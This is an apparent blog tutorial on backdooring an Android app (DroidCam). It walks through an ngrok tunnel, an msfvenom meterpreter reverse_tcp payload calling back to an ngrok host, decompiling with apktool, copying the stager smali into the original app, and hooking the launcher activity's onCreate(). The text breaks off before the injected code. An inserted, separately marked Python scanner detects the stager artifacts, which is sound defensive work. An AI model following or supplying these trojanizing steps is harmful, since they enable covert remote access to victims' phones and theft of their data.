How to bind payload with APK in 2021
This post is about manually embedding a payload into an Android APK.
Why Android?
As the figure shows, Android is the most common smartphone operating system in the world; in India alone, approximately 90 percent of smartphone users have Android installed on their devices, whether the Lollipop or Nougat edition. Because of Android's success and its instability problems, it has become the first choice for cybercriminals to target. A huge number of Android users are not familiar with Android security, which is another aspect cybercriminals take advantage of: through social engineering, users download backdoored applications that lead to the compromise of their devices. In this article we are going to talk about a common technique that cybercriminals use to backdoor APKs.
DISCLAIMER: This tutorial/software is intended for educational purposes only. It should not be used for illegal activity. The author will not be responsible for the use thereof. Don't be a jerk about it.
Getting Started
This guide assumes that you:
- Have a basic knowledge of Linux.
- Are running a Debian-based system (Ubuntu, Kali Linux).
- Have an original APK to work with (I used DroidCam).
- Have Apktool, Ngrok and Metasploit installed.
Fire up Ngrok!
What is ngrok: it exposes local servers behind NATs and firewalls to the public internet over secure tunnels.
Start by signing up to ngrok and getting your auth token. Download ngrok and unzip it:
unzip /path/to/ngrok.zip
Once ngrok is unzipped, make it executable:
sudo chmod +x ngrok
Now add your ngrok auth token with the following command:
./ngrok authtoken <YOUR_AUTH_TOKEN>
Once the auth token has been accepted, launch ngrok with the command below. You can change the port to whatever local port you want to open; ngrok prints the public host and port it forwards to it.
./ngrok tcp 4411
Switching on necessary services
Open a new terminal and use the commands below to start the required services.
service postgresql start
service apache2 start
Metasploit Part
Type the command below to generate an Android payload that connects back through ngrok (lhost and lport are the public host and port shown in ngrok's output).
msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=12553 R > payload.apk
Now our malicious payload is ready!
Next it is time to decompile the APK files. Open a new terminal and use the command below to decompile the payload APK into a new folder; the original APK is decompiled the same way.
apktool d -f payload.apk -o payload
Decompiling the original APK works the same way, into a folder named Original.
Command explanation: the d option tells apktool to decompile the APK file, -f replaces any previously decompiled output, and -o sets the output location for the decompiled files.
Payload.smali
Now we need to copy the payload file into the original APK's folder. The payload file is Payload.smali, found at payload/smali/com/metasploit/stage; copy it from there.
Then create the matching folders inside the original app's folder: Original > smali > com > metasploit > stage.
Now paste the copied Payload.smali file at this location.
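A defender-side check, added here as an example that is not part of the original post: it scans an apktool output tree for exactly the artifacts this step and the later onCreate() splice leave behind, namely the stager class at smali/com/metasploit/stage/Payload.smali and any other smali code that references Lcom/metasploit/stage/Payload;. The sample tree it builds is constructed for the demo, and the method name "run" in it is a placeholder, not the real stager call.

```python
import re
import tempfile
from pathlib import Path

# Location of the Metasploit stager class that the walkthrough above copies
# into the decompiled original app (smali/com/metasploit/stage/Payload.smali).
STAGER_FILE = Path("smali/com/metasploit/stage/Payload.smali")
# Any smali reference to that class from other code, such as the call the
# tutorial later splices into the launcher activity's onCreate().
STAGER_REF = re.compile(r"Lcom/metasploit/stage/Payload;->(\w+)")

def scan_decompiled_apk(root):
    """Scan an apktool output tree; return a list of human-readable findings."""
    root = Path(root)
    findings = []
    if (root / STAGER_FILE).is_file():
        findings.append(f"stager class present: {STAGER_FILE.as_posix()}")
    # apktool may emit smali/, smali_classes2/, ... for multidex apps.
    for smali in sorted(root.glob("smali*/**/*.smali")):
        rel = smali.relative_to(root)
        if rel == STAGER_FILE:
            continue  # the stager naming itself is expected
        for m in STAGER_REF.finditer(smali.read_text(errors="replace")):
            findings.append(f"{rel.as_posix()}: calls Payload->{m.group(1)}")
    return findings

def build_sample_tree(inject):
    """Constructed apktool-style tree for demonstration (not a real decompile)."""
    root = Path(tempfile.mkdtemp())
    entry = root / "smali/com/dev47apps/droidcam/DroidCam.smali"
    entry.parent.mkdir(parents=True)
    body = [".class public Lcom/dev47apps/droidcam/DroidCam;",
            ".method protected onCreate(Landroid/os/Bundle;)V",
            "    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V"]
    if inject:
        # Stand-in for the spliced call; the method name "run" is constructed here.
        body.append("    invoke-static {p0}, Lcom/metasploit/stage/Payload;->run(Landroid/content/Context;)V")
        stager = root / STAGER_FILE
        stager.parent.mkdir(parents=True)
        stager.write_text(".class public Lcom/metasploit/stage/Payload;\n")
    body += ["    return-void", ".end method"]
    entry.write_text("\n".join(body) + "\n")
    return root

if __name__ == "__main__":
    for line in scan_decompiled_apk(build_sample_tree(inject=True)):
        print(line)
```

Point scan_decompiled_apk at a real apktool d output directory to check an APK you have been handed; an empty list means neither artifact was found.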
Now we need to find out which activity runs when the original app is launched; this information is stored in the AndroidManifest.xml file.
Open AndroidManifest.xml in your favourite text editor. In the file, we are looking for the following lines:
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
The manifest is XML, with the familiar tags and attributes. Look for an <activity> tag that contains both of these lines; you can use CTRL+F to search for them.
We can see that the entry activity is listed as com.dev47apps.droidcam.DroidCam. We know this because that activity's intent-filter contains "android.intent.action.MAIN".
Follow the path smali > com > dev47apps > droidcam > DroidCam.smali
Open DroidCam.smali in your favourite text editor.
Modify the Activity EntryPoint Smali File
Within the DroidCam.smali file, we are looking for the onCreate() method:
;->onCreate(Landroid/os/Bundle;)V
When you locate it, paste the following code on the line after it; this will start the payload alongside the original app's code.